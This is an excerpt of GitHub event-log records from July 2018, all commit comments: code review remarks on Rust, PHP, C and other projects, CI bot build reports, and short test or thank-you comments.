{"id":"7932043051","type":"CommitCommentEvent","actor":{"login":"StoneSet"},"repo":{"name":"retrobox/api"},"payload":{"comment":{"id":29629039,"position":null,"line":null,"path":null,"commit_id":"239b1bf46510918188174fd378b2dcdb869c4ed8","created_at":"2018-07-07T09:08:00Z","updated_at":"2018-07-07T09:08:00Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-07T09:08:00Z"}
{"id":"7932045842","type":"CommitCommentEvent","actor":{"login":"fujinqiu2018"},"repo":{"name":"fujinqiu2018/gmall0228"},"payload":{"comment":{"id":29629042,"position":null,"line":null,"path":null,"commit_id":"c2a4adab7b2fa62d28909b8f50a3240c68d3437d","created_at":"2018-07-07T09:10:14Z","updated_at":"2018-07-07T09:10:14Z","author_association":"OWNER","body":"1111112121231231"}},"created_at":"2018-07-07T09:10:14Z"}
{"id":"7932046074","type":"CommitCommentEvent","actor":{"login":"xxyan0205"},"repo":{"name":"didi/mand-mobile"},"payload":{"comment":{"id":29629043,"position":null,"line":null,"path":null,"commit_id":"9776228c04c9cc5c70e5281d41c11309ff39af49","created_at":"2018-07-07T09:10:25Z","updated_at":"2018-07-07T09:10:25Z","author_association":"MEMBER","body":"#131 "}},"created_at":"2018-07-07T09:10:25Z"}
{"id":"7932049189","type":"CommitCommentEvent","actor":{"login":"Aries000004"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29629048,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-07T09:12:55Z","updated_at":"2018-07-07T09:12:55Z","author_association":"NONE","body":"mytvsuper help me!\r\n"}},"created_at":"2018-07-07T09:12:55Z"}
{"id":"7932049457","type":"CommitCommentEvent","actor":{"login":"Aries000004"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29629049,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-07T09:13:07Z","updated_at":"2018-07-07T09:13:07Z","author_association":"NONE","body":"thanks\r\n"}},"created_at":"2018-07-07T09:13:07Z"}
{"id":"7932052176","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29629056,"position":14,"line":512,"path":"src/agreement/mod.rs","commit_id":"b2a65fe08483fbe8c24cd47d2cb48263cabed027","created_at":"2018-07-07T09:15:29Z","updated_at":"2018-07-07T09:15:29Z","author_association":"CONTRIBUTOR","body":"The reason for having the assignment to `self.output` here is that `self.handle_message` has taken out its value. So, if we call `Agreement::handle_message` from within another call to `Agreement::handle_message` or `Agreement::input`, we have to put the taken value of `self.output` back or it will get lost and the outer call would return `None` as `Step::output`.\r\n\r\nA nicer abstraction is possible for such one-time write/read variables.\r\n* Such variables are essentially immutable because they can be written only once.\r\n* Moreover, they can be read only once.\r\n\r\nThis can be implemented using a linear type: https://www.inf.ed.ac.uk/teaching/courses/epl/2017/lectures/guestlec3.pdf"}},"created_at":"2018-07-07T09:15:29Z"}
{"id":"7932067250","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29629082,"position":null,"line":null,"path":null,"commit_id":"e9f79994278968cc86698a7d90e05ca01201c441","created_at":"2018-07-07T09:29:00Z","updated_at":"2018-07-07T09:29:00Z","author_association":"CONTRIBUTOR","body":"@wolfbeast \r\nIt's in `js-modules` branch. Is it right?\r\n"}},"created_at":"2018-07-07T09:29:00Z"}
{"id":"7932068612","type":"CommitCommentEvent","actor":{"login":"BoyanGigov"},"repo":{"name":"BoyanGigov/LibraryProject"},"payload":{"comment":{"id":29629087,"position":null,"line":null,"path":null,"commit_id":"a83c1aa73bb5a2a0d2d7e0db6528d9ae600c0359","created_at":"2018-07-07T09:30:11Z","updated_at":"2018-07-07T09:30:11Z","author_association":"OWNER","body":"Additionally to making package name changes, IllegalArgumentException-s have been added to a couple setters from both Book and Author classes, as well as their constructors.\r\nFurthermore another setter has been added for both dates that takes in numbers as parameters."}},"created_at":"2018-07-07T09:30:11Z"}
{"id":"7932069639","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"collective/collective.ifttt"},"payload":{"comment":{"id":29629090,"position":14,"line":14,"path":"src/collective/ifttt/browser/views.py","commit_id":"990c04b55d008a5046af10cbacc32e0f1506ff54","created_at":"2018-07-07T09:30:56Z","updated_at":"2018-07-07T09:30:56Z","author_association":"COLLABORATOR","body":"I’d expect that to execute if context is not a folder, but eg a Document."}},"created_at":"2018-07-07T09:30:56Z"}
{"id":"7932070024","type":"CommitCommentEvent","actor":{"login":"dignajar"},"repo":{"name":"sciseo/Bludit-2.3.4-Cyr"},"payload":{"comment":{"id":29629091,"position":7,"line":16,"path":"index.php","commit_id":"7f1b6ffac69cb2b98a3bc7d747d18b6375191d0f","created_at":"2018-07-07T09:31:11Z","updated_at":"2018-07-07T09:31:11Z","author_association":"NONE","body":"We need the `$base` if you are in `https://example.com/bludit/admin` the redirection doesn't work."}},"created_at":"2018-07-07T09:31:11Z"}
{"id":"7932071531","type":"CommitCommentEvent","actor":{"login":"dignajar"},"repo":{"name":"sciseo/Bludit-2.3.4-Cyr"},"payload":{"comment":{"id":29629096,"position":71,"line":143,"path":"bl-kernel/helpers/text.class.php","commit_id":"7f1b6ffac69cb2b98a3bc7d747d18b6375191d0f","created_at":"2018-07-07T09:32:25Z","updated_at":"2018-07-07T09:32:25Z","author_association":"NONE","body":"where is `$separator` defined ?"}},"created_at":"2018-07-07T09:32:25Z"}
{"id":"7932072973","type":"CommitCommentEvent","actor":{"login":"Walaa1994"},"repo":{"name":"Walaa1994/cv"},"payload":{"comment":{"id":29629097,"position":null,"line":null,"path":null,"commit_id":"3254a868e92e2dda6dcf40e29be27e27b6d43780","created_at":"2018-07-07T09:33:37Z","updated_at":"2018-07-07T09:33:37Z","author_association":"OWNER","body":"walaa"}},"created_at":"2018-07-07T09:33:37Z"}
{"id":"7932073568","type":"CommitCommentEvent","actor":{"login":"dignajar"},"repo":{"name":"sciseo/Bludit-2.3.4-Cyr"},"payload":{"comment":{"id":29629099,"position":5,"line":9,"path":".htaccess","commit_id":"7f1b6ffac69cb2b98a3bc7d747d18b6375191d0f","created_at":"2018-07-07T09:34:04Z","updated_at":"2018-07-07T09:34:04Z","author_association":"NONE","body":"if you defined the base `/` and the user install Bludit inside a folder, the user need to come here and modified by hand, the `installer.php` try to modified this file and write the proper Rewritebase"}},"created_at":"2018-07-07T09:34:04Z"}
{"id":"7932074692","type":"CommitCommentEvent","actor":{"login":"ciscoheat"},"repo":{"name":"ciscoheat/immutable-hx"},"payload":{"comment":{"id":29629101,"position":28,"line":27,"path":"src/immutable/BuildImmutableClass.hx","commit_id":"6b79e6a132237a11cd736566bc4a16d6a9e56361","created_at":"2018-07-07T09:34:56Z","updated_at":"2018-07-07T09:34:56Z","author_association":"OWNER","body":"I have `haxe_ver` reported as `\"4.000\"` on my system, so I didn't want to take any chances."}},"created_at":"2018-07-07T09:34:56Z"}
{"id":"7932074889","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629103,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-07T09:35:05Z","updated_at":"2018-07-07T09:35:05Z","author_association":"NONE","body":"158868652_Issue#5821 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-07T09:35:05Z"}
{"id":"7932075201","type":"CommitCommentEvent","actor":{"login":"canesti22"},"repo":{"name":"cobo6998/Bank_Management"},"payload":{"comment":{"id":29629104,"position":null,"line":null,"path":null,"commit_id":"585dabd183015c2917b0665f09ae711e8cd4cb8b","created_at":"2018-07-07T09:35:18Z","updated_at":"2018-07-07T09:35:18Z","author_association":"CONTRIBUTOR","body":"transact"}},"created_at":"2018-07-07T09:35:18Z"}
{"id":"7932075471","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conan-feedstock"},"payload":{"comment":{"id":29629105,"position":null,"line":null,"path":null,"commit_id":"24bc41512276c5de3e3e815f00c303bcf4f36008","created_at":"2018-07-07T09:35:30Z","updated_at":"2018-07-07T09:35:30Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @memsharded were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @memsharded were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-07T09:35:30Z"}
{"id":"7932076538","type":"CommitCommentEvent","actor":{"login":"CHBMB"},"repo":{"name":"linuxserver/docker-mylar-arm64"},"payload":{"comment":{"id":29629111,"position":null,"line":null,"path":null,"commit_id":"5b33d3ed2d6eb1cc831f8f51e7e67af32b47b55d","created_at":"2018-07-07T09:36:24Z","updated_at":"2018-07-07T09:36:24Z","author_association":"MEMBER","body":"On mobile - approved"}},"created_at":"2018-07-07T09:36:24Z"}
{"id":"7932076746","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629112,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-07T09:36:33Z","updated_at":"2018-07-07T09:36:33Z","author_association":"NONE","body":"158868652_Issue#5821 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T09:36:33Z"}
{"id":"7932076811","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29629113,"position":14,"line":512,"path":"src/agreement/mod.rs","commit_id":"b2a65fe08483fbe8c24cd47d2cb48263cabed027","created_at":"2018-07-07T09:36:36Z","updated_at":"2018-07-07T09:36:36Z","author_association":"CONTRIBUTOR","body":"I think we should output only once, and never drop a returned output, i.e. if it's returned by an internal `handle_message` call, it should be propagated up to the caller. I agree that it should be treated as a linear type: it shouldn't need to be copied, but you `#[must_use]` it, so we never duplicate an output, message or fault log, but we always return them.\r\n\r\nI'll check out the slides. :smiley: "}},"created_at":"2018-07-07T09:36:36Z"}
{"id":"7932076945","type":"CommitCommentEvent","actor":{"login":"lindadadada1"},"repo":{"name":"lindadadada1/cici"},"payload":{"comment":{"id":29629115,"position":null,"line":null,"path":null,"commit_id":"7e4a467d15e3138326c5b14f18f8c2dc71004749","created_at":"2018-07-07T09:36:44Z","updated_at":"2018-07-07T09:36:44Z","author_association":"OWNER","body":"e"}},"created_at":"2018-07-07T09:36:44Z"}
{"id":"7932077881","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"ciscoheat/immutable-hx"},"payload":{"comment":{"id":29629116,"position":28,"line":27,"path":"src/immutable/BuildImmutableClass.hx","commit_id":"6b79e6a132237a11cd736566bc4a16d6a9e56361","created_at":"2018-07-07T09:37:29Z","updated_at":"2018-07-07T09:37:29Z","author_association":"NONE","body":"That's what it is everywhere, not just on your system. :) OCaml string comparison is a bit magic, I think..."}},"created_at":"2018-07-07T09:37:29Z"}
{"id":"7932081323","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"trimpim/genode"},"payload":{"comment":{"id":29629121,"position":null,"line":null,"path":null,"commit_id":"8c72f4e7b7df26a991556734131fee8c1103aa8a","created_at":"2018-07-07T09:40:09Z","updated_at":"2018-07-07T09:40:09Z","author_association":"NONE","body":"I deliberately left the policy empty. Originally, I did the same as your patch but noticed that acpica then interferes with already-running device drivers, specifically the ahci driver in my case. By not exposing any PCI device to acpica, the power-management-related features (e.g., battery reporting) still work while the PCI devices remain untouched by acpica.\r\n\r\nNow., two questions come in my mind:\r\n* Don't you observe any problems with the acpica accessing devices that are already in use?\r\n* What additional feature of acpica do you gain by this change? "}},"created_at":"2018-07-07T09:40:09Z"}
{"id":"7932082406","type":"CommitCommentEvent","actor":{"login":"allustin"},"repo":{"name":"silverbulleters/ovm"},"payload":{"comment":{"id":29629122,"position":null,"line":null,"path":null,"commit_id":"a2c16c7637b212b399019ee7184edd659e0c4fea","created_at":"2018-07-07T09:40:55Z","updated_at":"2018-07-07T09:40:55Z","author_association":"CONTRIBUTOR","body":"@nixel2007 вообще не понял как так получилось - я всего лишь фиксил url, все остальное в ветках. Откатить теперь это интересно можно.. буду пробовать сегодня"}},"created_at":"2018-07-07T09:40:55Z"}
{"id":"7932083265","type":"CommitCommentEvent","actor":{"login":"whansheng"},"repo":{"name":"whansheng/wgj_share"},"payload":{"comment":{"id":29629124,"position":null,"line":null,"path":null,"commit_id":"339daccd0483ceb0e41651b3dfe1741d1c08d36f","created_at":"2018-07-07T09:41:36Z","updated_at":"2018-07-07T09:41:36Z","author_association":"OWNER","body":"test "}},"created_at":"2018-07-07T09:41:36Z"}
{"id":"7932084102","type":"CommitCommentEvent","actor":{"login":"dimobelov"},"repo":{"name":"sciseo/Bludit-2.3.4-Cyr"},"payload":{"comment":{"id":29629125,"position":5,"line":9,"path":".htaccess","commit_id":"7f1b6ffac69cb2b98a3bc7d747d18b6375191d0f","created_at":"2018-07-07T09:42:12Z","updated_at":"2018-07-07T09:42:12Z","author_association":"CONTRIBUTOR","body":"no no this is from my editor check other changes in kernel\r\n"}},"created_at":"2018-07-07T09:42:12Z"}
{"id":"7932084500","type":"CommitCommentEvent","actor":{"login":"misbach-zuhdi"},"repo":{"name":"bhayangkara0707/palapa-be"},"payload":{"comment":{"id":29629126,"position":null,"line":null,"path":null,"commit_id":"b409e9de2569739fdad77af5647be52e0404f02f","created_at":"2018-07-07T09:42:34Z","updated_at":"2018-07-07T09:42:34Z","author_association":"CONTRIBUTOR","body":"please review @stevanusandrianta , blm gw test apakah caranya benar?"}},"created_at":"2018-07-07T09:42:34Z"}
{"id":"7932086814","type":"CommitCommentEvent","actor":{"login":"dimobelov"},"repo":{"name":"sciseo/Bludit-2.3.4-Cyr"},"payload":{"comment":{"id":29629128,"position":7,"line":16,"path":"index.php","commit_id":"7f1b6ffac69cb2b98a3bc7d747d18b6375191d0f","created_at":"2018-07-07T09:44:30Z","updated_at":"2018-07-07T09:44:30Z","author_association":"CONTRIBUTOR","body":"for windows base is '\\'"}},"created_at":"2018-07-07T09:44:30Z"}
{"id":"7932087121","type":"CommitCommentEvent","actor":{"login":"d1moniq"},"repo":{"name":"d1moniq/saas-template"},"payload":{"comment":{"id":29629129,"position":null,"line":null,"path":null,"commit_id":"6f9ad7edcec2dfa1d58da9d90aea480d1c45f51e","created_at":"2018-07-07T09:44:47Z","updated_at":"2018-07-07T09:44:47Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-07T09:44:47Z"}
{"id":"7932090868","type":"CommitCommentEvent","actor":{"login":"dimobelov"},"repo":{"name":"sciseo/Bludit-2.3.4-Cyr"},"payload":{"comment":{"id":29629138,"position":71,"line":143,"path":"bl-kernel/helpers/text.class.php","commit_id":"7f1b6ffac69cb2b98a3bc7d747d18b6375191d0f","created_at":"2018-07-07T09:48:06Z","updated_at":"2018-07-07T09:48:06Z","author_association":"CONTRIBUTOR","body":"same function as parameter \r\npublic static function cleanUrl($string, $separator='-')\r\nWhen we have \"space\" on begin or end of \"title \" slug become \"title-\". with this is fixed"}},"created_at":"2018-07-07T09:48:06Z"}
{"id":"7932092921","type":"CommitCommentEvent","actor":{"login":"jarlebring"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29629142,"position":5,"line":136,"path":"src/method_iar_chebyshev.jl","commit_id":"4bcf05061dff7eae281eb4f3f9f9a88dc2999557","created_at":"2018-07-07T09:49:54Z","updated_at":"2018-07-07T09:49:54Z","author_association":"CONTRIBUTOR","body":"I would replace `&& isa(nep,DEP) || isa(nep,PEP)` with `&& (isa(nep,DEP) || isa(nep,PEP))` for readability. Most people don't memorize the priority of operations && vs ||."}},"created_at":"2018-07-07T09:49:54Z"}
{"id":"7932094011","type":"CommitCommentEvent","actor":{"login":"dimobelov"},"repo":{"name":"sciseo/Bludit-2.3.4-Cyr"},"payload":{"comment":{"id":29629145,"position":71,"line":143,"path":"bl-kernel/helpers/text.class.php","commit_id":"7f1b6ffac69cb2b98a3bc7d747d18b6375191d0f","created_at":"2018-07-07T09:50:50Z","updated_at":"2018-07-07T09:50:50Z","author_association":"CONTRIBUTOR","body":"also here if you call $string = self::lowercase($string); on begin you can remove all capital letters from  $specialChars array"}},"created_at":"2018-07-07T09:50:50Z"}
{"id":"7932095671","type":"CommitCommentEvent","actor":{"login":"lneuhaus"},"repo":{"name":"lneuhaus/pyrpl"},"payload":{"comment":{"id":29629147,"position":23,"line":22,"path":"pyrpl/hardware_modules/pid.py","commit_id":"dca39c933629bf68f3f4f2beac1c64da33017d0b","created_at":"2018-07-07T09:52:19Z","updated_at":"2018-07-07T09:52:19Z","author_association":"OWNER","body":"Can you comment on this change? Would it maybe make more sense to move this into the FPGA logic?"}},"created_at":"2018-07-07T09:52:19Z"}
{"id":"7932096810","type":"CommitCommentEvent","actor":{"login":"seanmcleod"},"repo":{"name":"JSBSim-Team/jsbsim"},"payload":{"comment":{"id":29629148,"position":null,"line":null,"path":null,"commit_id":"f552ce26420f184bc8c28fa26b12813d6394b5c8","created_at":"2018-07-07T09:53:20Z","updated_at":"2018-07-07T09:53:20Z","author_association":"COLLABORATOR","body":"@bcoconni I had wondered what the reciprocal values were for when I was working on the atmosphere code, didn't realise it was a performance optimization."}},"created_at":"2018-07-07T09:53:20Z"}
{"id":"7932096996","type":"CommitCommentEvent","actor":{"login":"lneuhaus"},"repo":{"name":"lneuhaus/pyrpl"},"payload":{"comment":{"id":29629149,"position":42,"line":50,"path":"pyrpl/hardware_modules/pid.py","commit_id":"dca39c933629bf68f3f4f2beac1c64da33017d0b","created_at":"2018-07-07T09:53:29Z","updated_at":"2018-07-07T09:53:29Z","author_association":"OWNER","body":"see above (moving saturation of ival to fpga logic). this change (one update per ms) must make everything much slower, no?"}},"created_at":"2018-07-07T09:53:29Z"}
{"id":"7932097774","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29629150,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-07T09:54:13Z","updated_at":"2018-07-07T09:54:13Z","author_association":"NONE","body":"谢谢@vrlink "}},"created_at":"2018-07-07T09:54:13Z"}
{"id":"7932097811","type":"CommitCommentEvent","actor":{"login":"lneuhaus"},"repo":{"name":"lneuhaus/pyrpl"},"payload":{"comment":{"id":29629151,"position":65,"line":84,"path":"pyrpl/hardware_modules/pid.py","commit_id":"dca39c933629bf68f3f4f2beac1c64da33017d0b","created_at":"2018-07-07T09:54:15Z","updated_at":"2018-07-07T09:54:15Z","author_association":"OWNER","body":"we might be able to compute the d from the input signal directly (opposed to the error-register), such that the delay of the d remains only 3 clock cycles.."}},"created_at":"2018-07-07T09:54:15Z"}
{"id":"7932098163","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"AOSIP-old/platform_manifest"},"payload":{"comment":{"id":29629152,"position":null,"line":null,"path":null,"commit_id":"bfea1f8a9ab822369b087c4fef9737921eb5fca2","created_at":"2018-07-07T09:54:35Z","updated_at":"2018-07-07T09:54:35Z","author_association":"CONTRIBUTOR","body":"Gay"}},"created_at":"2018-07-07T09:54:35Z"}
{"id":"7932098772","type":"CommitCommentEvent","actor":{"login":"lneuhaus"},"repo":{"name":"lneuhaus/pyrpl"},"payload":{"comment":{"id":29629153,"position":12,"line":434,"path":"pyrpl/redpitaya.py","commit_id":"dca39c933629bf68f3f4f2beac1c64da33017d0b","created_at":"2018-07-07T09:55:11Z","updated_at":"2018-07-07T09:55:11Z","author_association":"OWNER","body":"to be removed later on"}},"created_at":"2018-07-07T09:55:11Z"}
{"id":"7932100775","type":"CommitCommentEvent","actor":{"login":"dignajar"},"repo":{"name":"sciseo/Bludit-2.3.4-Cyr"},"payload":{"comment":{"id":29629155,"position":6,"line":97,"path":"bl-kernel/abstract/dbjson.class.php","commit_id":"7f1b6ffac69cb2b98a3bc7d747d18b6375191d0f","created_at":"2018-07-07T09:57:01Z","updated_at":"2018-07-07T09:57:01Z","author_association":"NONE","body":"This feature is from PHP v5.4. I'm still giving support for 5.3.\r\nMaybe I can define the constant if not defined as I did for `JSON_PRETTY_PRINT`."}},"created_at":"2018-07-07T09:57:01Z"}
{"id":"7933106685","type":"CommitCommentEvent","actor":{"login":"Daniel4rt"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29631373,"position":14,"line":253,"path":"src/map/log.cpp","commit_id":"91169d7ebccccaf5008076383c89ff3a6c514a9e","created_at":"2018-07-08T00:00:22Z","updated_at":"2018-07-08T00:00:22Z","author_association":"NONE","body":"Isn't map[m].name[0] ? map[m].name[0]?"}},"created_at":"2018-07-08T00:00:22Z"}
{"id":"7933109484","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631379,"position":99,"line":99,"path":"02-P-Dev_Tools/algorithm_Lee.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-08T00:03:04Z","updated_at":"2018-07-08T00:03:04Z","author_association":"NONE","body":"printf(\"%d\\n\",by);\r\ntwo printfs could be combined"}},"created_at":"2018-07-08T00:03:04Z"}
{"id":"7933110716","type":"CommitCommentEvent","actor":{"login":"TitanSnow"},"repo":{"name":"luogu-dev/markdown-it-katex"},"payload":{"comment":{"id":29631382,"position":null,"line":null,"path":null,"commit_id":"9d6eec6f2d012baa3b01024058b789bc4a079442","created_at":"2018-07-08T00:04:25Z","updated_at":"2018-07-08T00:04:25Z","author_association":"NONE","body":"Why? Pandoc also has this syntax that don’t allow space after $"}},"created_at":"2018-07-08T00:04:25Z"}
{"id":"7933111246","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631385,"position":55,"line":55,"path":"02-P-Dev_Tools/short_path.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-08T00:05:05Z","updated_at":"2018-07-08T00:05:05Z","author_association":"NONE","body":"__Never__ cast a malloc."}},"created_at":"2018-07-08T00:05:05Z"}
{"id":"7933111968","type":"CommitCommentEvent","actor":{"login":"Lemongrass3110"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29631387,"position":5,"line":229,"path":"src/map/log.cpp","commit_id":"91169d7ebccccaf5008076383c89ff3a6c514a9e","created_at":"2018-07-08T00:05:49Z","updated_at":"2018-07-08T00:05:49Z","author_association":"MEMBER","body":"Its okay like this.\r\nThe check is if the first character([0]) is \\0(zero termination). If it is not you want the full thing."}},"created_at":"2018-07-08T00:05:49Z"}
{"id":"7933116094","type":"CommitCommentEvent","actor":{"login":"NovaRain"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29631402,"position":19,"line":478,"path":"sfall/Modules/Scripting/Handlers/Interface.cpp","commit_id":"2a20209bb81a8824cd2d97209d89e5f2d9292093","created_at":"2018-07-08T00:10:21Z","updated_at":"2018-07-08T00:10:21Z","author_association":"COLLABORATOR","body":"Just tested. It makes inventory_redraw(1) also redraw player's inventory in the inventory/use screens. A kinda unexpected behavior because inventory_redraw(1) is supposed to redraw target's inventory, if there's no target it shouldn't work at all."}},"created_at":"2018-07-08T00:10:21Z"}
{"id":"7933120326","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631412,"position":56,"line":56,"path":"02-P-Dev_Tools/short_path.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-08T00:14:36Z","updated_at":"2018-07-08T00:14:36Z","author_association":"NONE","body":"If you need to dynamically allocate a matrix it's done like:\r\n```C\r\n\tint **matrix = malloc(n * sizeof(*matrix));\r\n\tfor (int i=0; i < n; i++) {\r\n\t\tmatrix[i] = malloc(n * sizeof(**matrix));\r\n\t}\r\n```"}},"created_at":"2018-07-08T00:14:36Z"}
{"id":"7933120681","type":"CommitCommentEvent","actor":{"login":"richardcornish"},"repo":{"name":"richardcornish/richardcornish"},"payload":{"comment":{"id":29631416,"position":5,"line":5,"path":"richardcornish/templates/base.html","commit_id":"1800bd8985612e89e708f212904556d136282dd1","created_at":"2018-07-08T00:15:01Z","updated_at":"2018-07-08T00:15:01Z","author_association":"OWNER","body":"Much better"}},"created_at":"2018-07-08T00:15:01Z"}
{"id":"7933120993","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29631420,"position":null,"line":null,"path":null,"commit_id":"3452a403b867476396bb56062d5f33a53adf8354","created_at":"2018-07-08T00:15:18Z","updated_at":"2018-07-08T00:15:18Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 689](https://travis-ci.org/per1234/arduino-ci-script/builds/401330995) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00689-001-tsv"}},"created_at":"2018-07-08T00:15:18Z"}
{"id":"7933121095","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29631421,"position":null,"line":null,"path":null,"commit_id":"3452a403b867476396bb56062d5f33a53adf8354","created_at":"2018-07-08T00:15:24Z","updated_at":"2018-07-08T00:15:24Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 689](https://travis-ci.org/per1234/arduino-ci-script/builds/401330995) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00689"}},"created_at":"2018-07-08T00:15:24Z"}
{"id":"7933122047","type":"CommitCommentEvent","actor":{"login":"fish2000"},"repo":{"name":"fish2000/Halide"},"payload":{"comment":{"id":29631422,"position":null,"line":null,"path":null,"commit_id":"a8d4ad781b040a3d9e8c88e20db8ea12d667d865","created_at":"2018-07-08T00:16:19Z","updated_at":"2018-07-08T00:16:19Z","author_association":"OWNER","body":"Oh and by the way, it looks like it works as advertised:\r\n\r\n![screen shot 2018-07-07 at 8 14 35 pm](https://user-images.githubusercontent.com/378969/42415606-77da3256-8222-11e8-8190-98b9ae6b26f1.jpg)\r\n\r\n… although we’ll have to do something about those `type_decls` – maybe, base64-encode them? Trash compactor? Hrm."}},"created_at":"2018-07-08T00:16:19Z"}
{"id":"7933122333","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631424,"position":null,"line":null,"path":null,"commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-08T00:16:40Z","updated_at":"2018-07-08T00:16:40Z","author_association":"NONE","body":"In general:\r\nI see a code of experienced programmer unfamiliar with C.\r\nRecommendations:\r\nSpend more time figuring out how things work in C"}},"created_at":"2018-07-08T00:16:40Z"}
{"id":"7933123845","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29631426,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-08T00:18:21Z","updated_at":"2018-07-08T00:18:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment 